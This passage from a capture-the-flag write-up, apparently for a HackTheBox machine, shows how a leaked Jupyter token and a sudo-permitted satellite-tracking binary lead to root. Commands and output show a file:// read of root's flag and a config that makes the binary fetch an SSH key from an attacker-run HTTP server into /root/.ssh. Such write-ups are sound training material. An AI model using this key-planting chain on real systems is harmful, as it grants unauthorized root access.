
file:///home/jovian/.local/share/jupyter/runtime/nbserver-1180-open.html

Or copy and paste one of these URLs:

http://localhost:8888/?token=0f59b92c7bc1784853411a7a97a376f58a020e220c3e01ac

or http://127.0.0.1:8888/?token=0f59b92c7bc1784853411a7a97a376f58a020e220c3e01ac

[I 22:41:12.846 NotebookApp] 302 GET / (127.0.0.1) 2.070000ms

[I 22:41:18.775 NotebookApp] 302 GET / (127.0.0.1) 0.750000ms

[I 00:01:13.156 NotebookApp] 302 GET / (127.0.0.1) 1.880000ms

juno@jupiter:/opt/solar-flares/logs$

|
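The token appears several times in the log as part of the access URLs. Here is a minimal sketch of extracting it with a regular expression, assuming the URL layout seen in the log above; the function name is illustrative.

```python
import re

TOKEN_URL = re.compile(r"https?://[^\s/]+:\d+/\?token=(?P<token>[0-9a-f]+)")


def tokens_in_log(text: str):
    """Return the distinct tokens found in a Jupyter log, in order of appearance."""
    seen = []
    for match in TOKEN_URL.finditer(text):
        if match["token"] not in seen:
            seen.append(match["token"])
    return seen


# Two lines copied from the log above.
log = (
    "[I 05:39:56.496 NotebookApp] http://localhost:8888/?token=0f59b92c7bc1784853411a7a97a376f58a020e220c3e01ac\n"
    "[I 05:39:56.496 NotebookApp] or http://127.0.0.1:8888/?token=0f59b92c7bc1784853411a7a97a376f58a020e220c3e01ac\n"
)
print(tokens_in_log(log))
```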





After entering the token, we find the notebook named flares.

Its code analyzes solar flares.

User - Jovian

We know jovian is running Jupyter, so we will write to this user's authorized_keys file to get SSH access. First we create a key pair for juno.

|

juno@jupiter:~$ ssh-keygen

Generating public/private rsa key pair.

Enter file in which to save the key (/home/juno/.ssh/id_rsa):

Enter passphrase (empty for no passphrase):

Enter same passphrase again:

Your identification has been saved in /home/juno/.ssh/id_rsa

Your public key has been saved in /home/juno/.ssh/id_rsa.pub

The key fingerprint is:

SHA256:XrF8pP5j64H+o2wGEnr+SMGsH/96a+UPn6kLPSuGK3M juno@jupiter

The key's randomart image is:

+---[RSA 3072]----+

| |

| |

| . . |

| o. . = |

| .+.S = . |

| ..oo.o +. |

| .oo..o+o= |

| o++EoBo=* o |

| o==X*BOB= |

+----[SHA256]-----+

juno@jupiter:~$ cat .ssh/id_rsa.pub > /dev/shm/juno

juno@jupiter:~$ chmod 7777 /dev/shm/juno

juno@jupiter:~$ cat /dev/shm/juno

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCl/XyhYpq3RsKXMW5izF+PiZhs2mqmJQgvR1QyV24Lc2WSKJcOs6qIAI4bLcf9qPN4iXJ2dlJsbuRqevFDmhQc8xxNInorAH28LzO8bqPxRpMKiYELoq0PP5O3bkO9Tw+eEJJejUNrYW3vTl4nTOwh0B0eptwmuFLbY4ZoBH8LXnExc1R34qwLj3IPAdr9b4TCCkfPqxdWfj2RQ3tZTMtkKvM7rzavc6w5x3BjN8fnGUDBGYot5z5dB/YdLGx38eDF36ERIOno/wJ6SCaciBDNG30fChx3Nh4o909Gz3bRLAPbsyCYn9FPfzWsRmHM7TBiMutxqDwiLbomZd7ocLfq3ZLaf0iIh+hPxAJet2+8aUi0ubNZsXCbF2lvGxEwNEjCR/iy6uUomxlMI3+mLbsmdGkAEbaQqUWDMRhybiNGb6ovy68xqKF08UqNKpxiXY1IJRIPHz3HJazj8kGYV36wk9g1WzgZHRfSueT4ktEPZjZVr8BYZgq7r6B9ysGk4ck= juno@jupiter

juno@jupiter:~$

|

In the notebook we ran commands that append the public key to jovian's authorized_keys file; the execution succeeded.
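The exact cell contents are only visible in the screenshots, so the following is a guess at an equivalent cell rather than the code that was actually run. It appends a public key file to `.ssh/authorized_keys` under a given home directory. The function name is illustrative, and the demo uses a temporary directory with a placeholder key.

```python
import os
import tempfile


def append_key(pubkey_path: str, home: str) -> str:
    """Append the key at `pubkey_path` to `home`/.ssh/authorized_keys."""
    ssh_dir = os.path.join(home, ".ssh")
    os.makedirs(ssh_dir, mode=0o700, exist_ok=True)
    target = os.path.join(ssh_dir, "authorized_keys")
    with open(pubkey_path) as src:
        key = src.read().strip()
    with open(target, "a") as dst:
        dst.write(key + "\n")
    # sshd commonly refuses key files that other users can write to.
    os.chmod(target, 0o600)
    return target


# Demo in a throwaway directory; the key text is a placeholder, not a real key.
with tempfile.TemporaryDirectory() as fake_home:
    key_file = os.path.join(fake_home, "juno.pub")
    with open(key_file, "w") as fh:
        fh.write("ssh-rsa PLACEHOLDER juno@jupiter\n")
    with open(append_key(key_file, fake_home)) as fh:
        written = fh.read()
print(written, end="")
```

In the notebook the call would be roughly `append_key("/dev/shm/juno", os.path.expanduser("~"))`, since the kernel runs as jovian.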

After that, we logged in as jovian over SSH.

|

juno@jupiter:~$ ssh jovian@localhost

The authenticity of host 'localhost (127.0.0.1)' can't be established.

ED25519 key fingerprint is SHA256:Ew7jqugz1PCBr4+xKa3GVApxe+GlYwliOFLdMlqXWf8.

This key is not known by any other names

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

yes

yes

Warning: Permanently added 'localhost' (ED25519) to the list of known hosts.

Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.0-72-generic x86_64)

* Documentation: https://help.ubuntu.com

* Management: https://landscape.canonical.com

* Support: https://ubuntu.com/advantage

System information as of Thu Oct 12 12:07:03 AM UTC 2023

System load: 0.0732421875

Usage of /: 82.2% of 12.33GB

Memory usage: 28%

Swap usage: 0%

Processes: 249

Users logged in: 1

IPv4 address for eth0: 10.10.11.216

IPv6 address for eth0: dead:beef::250:56ff:feb9:2751

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.

See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.

To check for new updates run: sudo apt update

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

To run a command as administrator (user "root"), use "sudo <command>".

See "man sudo_root" for details.

jovian@jupiter:~$ whoami;id;pwd

jovian

uid=1001(jovian) gid=1002(jovian) groups=1002(jovian),27(sudo),1001(science)

/home/jovian

jovian@jupiter:~$

|

Privesc

jovian can run sattrack with sudo, as any user and without a password.

|

jovian@jupiter:~$ sudo -l -l

Matching Defaults entries for jovian on jupiter:

env_reset, mail_badpass,

secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,

use_pty

User jovian may run the following commands on jupiter:

Sudoers entry:

RunAsUsers: ALL

Options: !authenticate

Commands:

/usr/local/bin/sattrack

jovian@jupiter:~$

|

sattrack

Running sattrack shows that it expects a configuration file.

|

jovian@jupiter:~$ sudo /usr/local/bin/sattrack

Satellite Tracking System

Configuration file has not been found. Please try again!

jovian@jupiter:~$

|

We ran strace on sattrack and saw that it tries to access the file /tmp/config.json.

|

jovian@jupiter:~$ strace /usr/local/bin/sattrack

[...]

getrandom("\x11", 1, GRND_NONBLOCK) = 1

newfstatat(AT_FDCWD, "/etc/gnutls/config", 0x7ffdf2c35ef0, 0) = -1 ENOENT (No such file or directory)

brk(0x5589e94f6000) = 0x5589e94f6000

futex(0x7f141083a77c, FUTEX_WAKE_PRIVATE, 2147483647) = 0

newfstatat(1, "", {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0x2), ...}, AT_EMPTY_PATH) = 0

write(1, "Satellite Tracking System\n", 26Satellite Tracking System

) = 26

newfstatat(AT_FDCWD, "/tmp/config.json", 0x7ffdf2c360d0, 0) = -1 ENOENT (No such file or directory)

write(1, "Configuration file has not been "..., 57Configuration file has not been found. Please try again!

) = 57

getpid() = 21030

exit_group(1) = ?

+++ exited with 1 +++

jovian@jupiter:~$

|
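In a longer trace, the paths a program fails to find are easier to spot after filtering for ENOENT. This sketch extracts the first quoted path from every call that returned `-1 ENOENT`. It assumes the one-call-per-line layout shown above, and the function name is illustrative.

```python
import re

# First quoted, non-empty argument of a call that failed with ENOENT.
ENOENT_CALL = re.compile(r'^\w+\([^"]*"(?P<path>[^"]+)".*= -1 ENOENT')


def missing_paths(strace_text: str):
    """Return the paths of calls that failed because the file does not exist."""
    paths = []
    for line in strace_text.splitlines():
        match = ENOENT_CALL.match(line)
        if match:
            paths.append(match["path"])
    return paths


# Three lines copied from the trace above.
sample = """newfstatat(AT_FDCWD, "/etc/gnutls/config", 0x7ffdf2c35ef0, 0) = -1 ENOENT (No such file or directory)
newfstatat(1, "", {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0x2), ...}, AT_EMPTY_PATH) = 0
newfstatat(AT_FDCWD, "/tmp/config.json", 0x7ffdf2c360d0, 0) = -1 ENOENT (No such file or directory)
"""
print(missing_paths(sample))
```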

We created the file, and running sattrack again produced a JSON parse error. After writing {} to the file, the program reported that tleroot is not defined. Once we added it, the program reported that the directory did not exist and created it, then asked for updatePerdiod (spelled this way in the program's output).

|

jovian@jupiter:~$ touch /tmp/config.json

jovian@jupiter:~$ sudo /usr/local/bin/sattrack

Satellite Tracking System

Malformed JSON conf: [json.exception.parse_error.101] parse error at line 1, column 1: syntax error while parsing value - unexpected end of input; expected '[', '{', or a literal

jovian@jupiter:~$ echo '{}' > /tmp/config.json

jovian@jupiter:~$ sudo /usr/local/bin/sattrack

Satellite Tracking System

tleroot not defined in config

jovian@jupiter:~$

jovian@jupiter:~$ echo '{"tleroot":"1"}' > /tmp/config.json

jovian@jupiter:~$ sudo /usr/local/bin/sattrack

Satellite Tracking System

tleroot does not exist, creating it: 1

updatePerdiod not defined in config

jovian@jupiter:~$

|
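The three runs above suggest the binary parses the JSON first and then looks for keys one at a time. Below is a sketch that mimics that order of checks so a candidate config can be tested offline. The key list contains only the two names seen in the output, and the messages are modeled on the program's output rather than taken from its source.

```python
import json

# Only the two keys that appear in the output above.
REQUIRED = ["tleroot", "updatePerdiod"]


def first_problem(config_text: str):
    """Return a message for the first problem found, or None if there is none."""
    try:
        config = json.loads(config_text)
    except json.JSONDecodeError as exc:
        return f"malformed JSON: {exc.msg}"
    if not isinstance(config, dict):
        return "top-level value is not an object"
    for key in REQUIRED:
        if key not in config:
            return f"{key} not defined in config"
    return None


for text in ["", "{}", '{"tleroot":"1"}']:
    print(repr(text), "->", first_problem(text))
```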

The program has just created the directory 1, which is empty.

|

jovian@jupiter:~$ ls -lah

total 44K

drwxr-x--- 8 jovian jovian 4.0K Oct 12 01:16 .

drwxr-xr-x 4 root root 4.0K Mar 7 2023 ..

drwxr-xr-x 2 root root 4.0K Oct 12 01:16 1

lrwxrwxrwx 1 jovian jovian 9 Mar 9 2023 .bash_history -> /dev/null

-rw-r--r-- 1 jovian jovian 220 Mar 7 2023 .bash_logout

-rw-r--r-- 1 jovian jovian 3.7K Mar 7 2023 .bashrc

drwx------ 4 jovian jovian 4.0K May 4 18:59 .cache

drwxrwxr-x 3 jovian jovian 4.0K May 4 18:59 .ipython

drwxrwxr-x 2 jovian jovian 4.0K Mar 10 2023 .jupyter

drwxrwxr-x 5 jovian jovian 4.0K May 4 18:59 .local

-rw-r--r-- 1 jovian jovian 807 Mar 7 2023 .profile

drwxrwxr-x 2 jovian jovian 4.0K Oct 12 00:06 .ssh

-rw-r--r-- 1 jovian jovian 0 Oct 12 00:11 .sudo_as_admin_successful

jovian@jupiter:~$

jovian@jupiter:~$ ls -lah 1

total 8.0K

drwxr-xr-x 2 root root 4.0K Oct 12 01:16 .

drwxr-x--- 8 jovian jovian 4.0K Oct 12 01:16 ..

jovian@jupiter:~$

|

The JSON file most likely needs more values, so we searched the web for the error messages the binary printed.





We found the arftracksat project, which shows the position of satellites in real time. Its source code contains the error messages and the values required in the JSON file. The binary on the machine appears to be a 'different' version of this project.

Local - arftracksat

After running the project locally, we found that the first four values in config.json are required: without them the program does not start. tlesources is a list of web resources that contain satellite positions, and the remaining values control how the data is drawn.

We analyzed the code, focusing on tlesources and specifically on the getTLEs() function. It iterates over the list, fetches each resource with curlpp, and writes what it receives to one file per resource. Nothing checks that an entry points to a particular URL, or that it is a URL at all.

|

π /tmp/tle ❯ ls

'gp.php?GROUP=starlink&FORMAT=tle' noaa.txt weather.txt

π /tmp/tle ❯ head noaa.txt

NOAA 1 [-]

1 04793U 70106A 23284.45617339 -.00000024 00000+0 12309-3 0 9998

2 04793 101.4897 339.7846 0031959 105.0106 266.5242 12.54019537417887

NOAA 2 (ITOS-D) [-]

1 06235U 72082A 23284.62156340 -.00000005 00000+0 26152-3 0 9995

2 06235 102.0030 275.8680 0003700 235.8849 233.2792 12.53168772332243

NOAA 3 [-]

1 06920U 73086A 23284.90011028 -.00000005 00000+0 30846-3 0 9990

2 06920 102.2600 273.9085 0006597 121.7751 305.4895 12.40359069260679

NOAA 4 [-]

π /tmp/tle ❯

|
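The listing above suggests how each download is named: the saved file appears to take everything after the last `/` of the source, query string included. The following is a minimal Python sketch of that rule, not the project's actual C++ code; `dest_path` and `root_dir` are hypothetical names, and the naming rule itself is an assumption inferred from the listing.

```python
def dest_path(root_dir: str, source: str) -> str:
    """Return where a fetched source would be saved (assumed naming rule)."""
    # Assumption: the file name is whatever follows the last '/' in the
    # source string, appended to the output directory unchanged.
    name = source.rsplit("/", 1)[-1]
    return root_dir + name


sources = [
    "http://celestrak.org/NORAD/elements/weather.txt",
    "http://celestrak.org/NORAD/elements/noaa.txt",
    "http://celestrak.org/NORAD/elements/gp.php?GROUP=starlink&FORMAT=tle",
]

for src in sources:
    print(dest_path("/tmp/tle/", src))
```

If the rule holds, whoever controls both the output directory and the last path segment of a source controls the full destination path.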

curlpp supports FTP, HTTP, HTTPS, and even FILE. The last of these makes it possible to read local files. We tested this locally by adding a new resource that uses file://.

|

[...]

"tlesources": [

"http://celestrak.org/NORAD/elements/weather.txt",

"http://celestrak.org/NORAD/elements/noaa.txt",

"http://celestrak.org/NORAD/elements/gp.php?GROUP=starlink&FORMAT=tle",

"file:///home/kali/sckull.txt"

],

[...]

|

We create the file in the kali user's home directory.

|

π arftracksat/build master ❯ echo 'lucifer' > /home/kali/sckull.txt

π arftracksat/build master ❯ ls -lah /home/kali/sckull.txt

-rw-r--r-- 1 kali kali 8 Oct 11 21:46 /home/kali/sckull.txt

π arftracksat/build master ❯

|

Fetching the resource raises no error. The only message is a parsing error, presumably because the file does not contain valid TLE data.

|

π arftracksat/build master ❯ ./arftracksat

arftracksat by arf20

Get:0 http://celestrak.org/NORAD/elements/weather.txt

Get:1 http://celestrak.org/NORAD/elements/noaa.txt

Get:2 http://celestrak.org/NORAD/elements/gp.php?GROUP=starlink&FORMAT=tle

Get:3 file:///home/kali/sckull.txt

[e] orbit_init_from_data:277: Invalid character found in offset 0

Satellites loaded

Map loaded [5127 points]

Earth loaded [6144 points]

|

The file was fetched successfully, and the copy holds the original content.

|

π /tmp/tle ❯ ls -lah

total 828K

drwxr-xr-x 2 kali kali 4.0K Oct 11 21:48 .

drwxrwxrwt 25 root root 4.0K Oct 11 21:39 ..

-rw-r--r-- 1 kali kali 799K Oct 11 21:48 'gp.php?GROUP=starlink&FORMAT=tle'

-rw-r--r-- 1 kali kali 3.8K Oct 11 21:48 noaa.txt

-rw-r--r-- 1 kali kali 8 Oct 11 21:48 sckull.txt

-rw-r--r-- 1 kali kali 7.9K Oct 11 21:48 weather.txt

π /tmp/tle ❯ cat sckull.txt

lucifer

π /tmp/tle ❯

|
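The same behaviour can be reproduced outside the tracker. The sketch below is a deliberately naive fetch loop in Python, with `urllib` standing in for curlpp; it is not the project's getTLEs() code. `fetch_all` and `demo` are hypothetical names, and the temporary file mirrors the sckull.txt test above.

```python
import tempfile
import urllib.request
from pathlib import Path


def fetch_all(sources, out_dir):
    """Fetch every source into out_dir with no scheme check (deliberately naive)."""
    out = Path(out_dir)
    out.mkdir(parents=True, exist_ok=True)
    saved = []
    for i, src in enumerate(sources):
        print(f"Get:{i} {src}")
        # Assumed naming rule: keep the text after the last '/'.
        name = src.rsplit("/", 1)[-1]
        # urlopen accepts file:// as readily as http://, so a local path
        # is read and copied like any remote resource.
        with urllib.request.urlopen(src) as resp:
            data = resp.read()
        target = out / name
        target.write_bytes(data)
        saved.append(target)
    return saved


def demo() -> str:
    """Copy a local file through a file:// source and return the copy's content."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = Path(tmp) / "sckull.txt"
        secret.write_text("lucifer\n")
        saved = fetch_all([secret.as_uri()], Path(tmp) / "tle")
        return saved[0].read_text()


if __name__ == "__main__":
    print(demo())
```

The point of the sketch is that the copy runs with the privileges of whoever runs the fetcher, which is what turns this into a file read primitive when the program is run through sudo.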

Read root.txt

We do the same on the machine, this time pointing the source at the root.txt flag, and manage to read it.

|

jovian@jupiter:~$ cat /tmp/config.json

{

"tleroot": "/tmp/tle/",

"tlefile": "weather.txt",

"mapfile": "/tmp/sat/map.json",

"texturefile": "/tmp/sat/earth.png",

"tlesources": [

"file:///root/root.txt"

],

[.. snip ..]

}

jovian@jupiter:~$ sudo /usr/local/bin/sattrack

Satellite Tracking System

Get:0 file:///root/root.txt

tlefile is not a valid file

jovian@jupiter:~$

jovian@jupiter:~$ cd /tmp/tle

jovian@jupiter:/tmp/tle$ ls -lah

total 20K

drwxr-xr-x 2 root root 4.0K Oct 12 01:05 .

drwxrwxrwt 17 root root 4.0K Oct 12 01:52 ..

-rw-r--r-- 1 root root 33 Oct 12 01:12 root.txt

jovian@jupiter:/tmp/tle$ cat root.txt

98913dedf9030149b08c4ec9faa7b825

jovian@jupiter:/tmp/tle$

|

Shell

We did not find any file that would give us access over SSH or another service. However, since the program writes the fetched files into the directory set in tleroot, we can write root's authorized_keys file, much like the way we gained access to juno.

We generate a key pair for jovian and start an HTTP server that serves the public key under the name authorized_keys.

|

jovian@jupiter:/tmp/tle$ ssh-keygen

Generating public/private rsa key pair.

Enter file in which to save the key (/home/jovian/.ssh/id_rsa):

Enter passphrase (empty for no passphrase):

Enter same passphrase again:

Your identification has been saved in /home/jovian/.ssh/id_rsa

Your public key has been saved in /home/jovian/.ssh/id_rsa.pub

The key fingerprint is:

SHA256:frD839+kRNOznN1nzA9cfK5q6TbgLFF5TC9Ti/H3zYU jovian@jupiter

The key's randomart image is:

+---[RSA 3072]----+

| |

| o . |

| + * o |

| o * Eoo|

| S. . oo+O|

| o.o. o.*@|

| ++.. .++X|

| .oo =o *+|

| ..=+o+.+|

+----[SHA256]-----+

jovian@jupiter:/tmp/tle$

|

|

π ~/htb/jupiter/www ❯ nano authorized_keys

π ~/htb/jupiter/www ❯ cat authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCvg1p2BbYDIZoIInn6HOZdZoniZxai5dOhQfD26g7A/2CaxVoW9fOw12XwWr/t2REF5ql/MYabJMFXVCA/Rm95DK981B9bLeQ7IjjV5X01GAieM9ElCPE6uKw5VPxw+X8SKGBnXfFSXEb3qml0StX3/qx2GPalE4b5CNQ/9RS5uGdlMfZ7AbHsr2ApADO3bcoAERqOJgRyg4OWi17gokCtNr8DkdOx/c/O3Esa0wxaO73gEsvtPhWChG/QIUB8/eMznffdod6e8JHLNJRpUeN0r71gK/6PhJBzlwvBInQcnDkVOnVDsUajbroIJJGXbPNtmGg5r+2NVUouXxTiqUG+JA3MhI/rSsvUU2OWtg0w+9IEQvOC+0KUNKnzYkh0ai/y+cxJ6cO0zwbPp5vPhdaWVgQjBxysq5PlM6459VL/u8EZGBFT4bmoCGFrA5uZPaGubCpyxIjOQt9aO+PwFYbrVhZncJjF4yj/XS3ADi6Zw/ZflhGDE7bK2BiXiByWDvU= jovian@jupiter

π ~/htb/jupiter/www ❯ httphere .

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

|
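`httphere` looks like a local shell alias. Its banner matches the one printed by Python's built-in `http.server`, so an equivalent can be sketched as below, assuming that is what the alias wraps. `serve_directory` and `demo` are hypothetical helpers, and the key written by `demo` is a placeholder, not a real key.

```python
import functools
import http.server
import tempfile
import threading
import urllib.request
from pathlib import Path


def serve_directory(directory, port=80, bind="0.0.0.0"):
    """Serve `directory` over HTTP in a background thread and return the server."""
    handler = functools.partial(
        http.server.SimpleHTTPRequestHandler, directory=str(directory)
    )
    server = http.server.ThreadingHTTPServer((bind, port), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def demo() -> bytes:
    """Serve a placeholder authorized_keys on a free local port and fetch it back."""
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "authorized_keys").write_text("placeholder-public-key\n")
        # Port 0 asks the OS for any free port, so no privileges are needed.
        server = serve_directory(tmp, port=0, bind="127.0.0.1")
        try:
            port = server.server_address[1]
            url = f"http://127.0.0.1:{port}/authorized_keys"
            with urllib.request.urlopen(url) as resp:
                return resp.read()
        finally:
            server.shutdown()
            server.server_close()


if __name__ == "__main__":
    print(demo())
```

Binding to port 80 as in the write-up normally requires elevated privileges on the attacking machine. Any free port would work as long as the source URL in config.json includes it.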

We edit config.json so that the fetched files are stored in /root/.ssh/, and add a resource pointing at our IP address, which serves the public key as authorized_keys.

|

{

"tleroot": "/root/.ssh/",

"tlefile": "weather.txt",

"mapfile": "/tmp/sat/map.json",

"texturefile": "/tmp/sat/earth.png",

"tlesources": [

"http://10.10.10.10/authorized_keys"

],

[.. snip ..]

}

|
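Only two keys change between the read and the write variants of the configuration. A small Python sketch of that edit follows; `patch_config` is a hypothetical helper, and the base dictionary holds only the keys visible in the write-up, since the rest are snipped there and are not reconstructed.

```python
import copy
import json


def patch_config(config: dict, tleroot: str, sources: list) -> dict:
    """Return a copy of config with tleroot and tlesources replaced."""
    patched = copy.deepcopy(config)
    patched["tleroot"] = tleroot            # directory the fetched files land in
    patched["tlesources"] = list(sources)   # resources to fetch
    return patched


# Keys shown in the write-up; the remaining ones are snipped there
# and are intentionally left out of this sketch.
base = {
    "tleroot": "/tmp/tle/",
    "tlefile": "weather.txt",
    "mapfile": "/tmp/sat/map.json",
    "texturefile": "/tmp/sat/earth.png",
    "tlesources": ["file:///root/root.txt"],
}

write_cfg = patch_config(
    base, "/root/.ssh/", ["http://10.10.10.10/authorized_keys"]
)
print(json.dumps(write_cfg, indent=4))
```

Patching a copy leaves the original configuration untouched, so the read variant remains available for later use.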

We run sattrack and then connect over SSH as root, obtaining a shell and the root.txt flag.

|

jovian@jupiter:/tmp$ sudo sattrack

Satellite Tracking System

Get:0 http://10.10.15.0/authorized_keys

tlefile is not a valid file

jovian@jupiter:/tmp$ ssh root@localhost

The authenticity of host 'localhost (127.0.0.1)' can't be established.

ED25519 key fingerprint is SHA256:Ew7jqugz1PCBr4+xKa3GVApxe+GlYwliOFLdMlqXWf8.

This key is not known by any other names

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added 'localhost' (ED25519) to the list of known hosts.

Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.0-72-generic x86_64)

* Documentation: https://help.ubuntu.com

* Management: https://landscape.canonical.com

* Support: https://ubuntu.com/advantage

System information as of Thu Oct 12 02:30:11 AM UTC 2023

System load: 0.0

Usage of /: 82.3% of 12.33GB

Memory usage: 28%

Swap usage: 0%

Processes: 256

Users logged in: 2

IPv4 address for eth0: 10.10.11.216

IPv6 address for eth0: dead:beef::250:56ff:feb9:2751

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.

See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.

To check for new updates run: sudo apt update

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

root@jupiter:~# whoami;id;pwd

root

uid=0(root) gid=0(root) groups=0(root)

/root

root@jupiter:~# ls

root.txt snap

root@jupiter:~# cat root.txt

98913dedf9030149b08c4ec9faa7b825

root@jupiter:~#

|